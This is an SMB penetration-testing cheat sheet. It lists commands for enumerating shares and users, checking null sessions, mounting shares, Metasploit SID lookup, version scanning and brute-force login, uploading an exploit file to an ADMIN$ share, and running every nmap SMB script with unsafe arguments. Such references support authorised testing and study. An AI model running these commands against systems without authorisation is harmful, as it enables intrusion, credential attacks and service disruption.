SMB
SMB¶
Find Shares on Network:
./enum4linux-ng.py -a x.x.x.x
nmap -v -p 139,445 -oG smb.txt 192.168.11.200-254
nbtscan -r 192.168.11.0/24
nmblookup -A target
smbclient -L //192.168.1.100
rpcclient -U "" target
smbmap -u "" -p "" -d MYGROUP -H 10.11.1.22
Finding Null Sessions in Windows:
net use \\TARGET\IPC$ "" /u:""
Finding Null Sessions in Linux:
smbclient -L //192.168.99.131
./enum4linux-ng.py -a 192.168.1.1
Enumerating Users:
nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254
Finding Folders using a login:
nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24
Mount a share¶
Using smbclient:
smbclient -L \\WIN7\ -I 192.168.13.218
smbclient -L \\WIN7\ADMIN$ -I 192.168.13.218
smbclient -L \\WIN7\C$ -I 192.168.13.218
smbclient -L \\WIN7\IPC$ -I 192.168.13.218
smbclient \\192.168.13.236\some-share -o user=root,pass=root,workgroup=BOB
Using mount:
apt-get install cifs-utils
mount -t cifs //10.11.6.31/wwwroot -o username=xxx,password=xxx /tmp/smb/
mount -t auto --source //192.168.31.147/kathy --target /tmp/smb/ -o username=root,workgroup=WORKGROUP
Windows:
C:\WINDOWS\system32> dir \\Computer_name\wwwroot
net use X: \\<server>\<sharename> /USER:<domain>\<username> <password> /PERSISTENT:YES
Metasploit¶
SMB UID lookup:
msf auxiliary(scanner/smb/smb_lookupsid) > use auxiliary/scanner/smb/smb_lookupsid
msf auxiliary(scanner/smb/smb_lookupsid) > set RHOSTS 192.168.31.142
RHOSTS => 192.168.31.142
msf auxiliary(scanner/smb/smb_lookupsid) > run
[*] 192.168.31.142:139 - PIPE(LSARPC) LOCAL(MYGROUP - 5-21-4157223341-3243572438-1405127623) DOMAIN(MYGROUP - )
[*] 192.168.31.142:139 - TYPE=0 NAME=Administrator rid=500
Getting SMB version:
msf auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_version
msf auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.31.142
RHOSTS => 192.168.31.142
msf auxiliary(scanner/smb/smb_version) > run
[*] 192.168.31.142:139 - Host could not be identified: Unix (Samba 2.2.1a)
SMB brute force:
msf auxiliary(scanner/smb/smb_login) > use auxiliary/scanner/smb/smb_login
msf auxiliary(scanner/smb/smb_login) > set RHOSTS 192.168.31.142
RHOSTS => 192.168.31.142
msf auxiliary(scanner/smb/smb_login) > run
Upload a File with SMB¶
smbclient //192.168.31.142/ADMIN$ -U "nobody"%"somepassword" -c "put 40280.py"
NMAP SMB scripts¶
bridings@lupin:/usr/share/nmap/scripts
>>> ls smb*
smb2-capabilities.nse smb-protocols.nse
smb2-security-mode.nse smb-psexec.nse
smb2-time.nse smb-security-mode.nse
smb2-vuln-uptime.nse smb-server-stats.nse
smb-brute.nse smb-system-info.nse
smb-double-pulsar-backdoor.nse smb-vuln-conficker.nse
smb-enum-domains.nse smb-vuln-cve2009-3103.nse
smb-enum-groups.nse smb-vuln-cve-2017-7494.nse
smb-enum-processes.nse smb-vuln-ms06-025.nse
smb-enum-services.nse smb-vuln-ms07-029.nse
smb-enum-sessions.nse smb-vuln-ms08-067.nse
smb-enum-shares.nse smb-vuln-ms10-054.nse
smb-enum-users.nse smb-vuln-ms10-061.nse
smb-flood.nse smb-vuln-ms17-010.nse
smb-ls.nse smb-vuln-regsvc-dos.nse
smb-mbenum.nse smb-vuln-webexec.nse
smb-os-discovery.nse smb-webexec-exploit.nse
smb-print-text.nse
>>> nmap --script smb-* --script-args=unsafe=1 192.168.10.55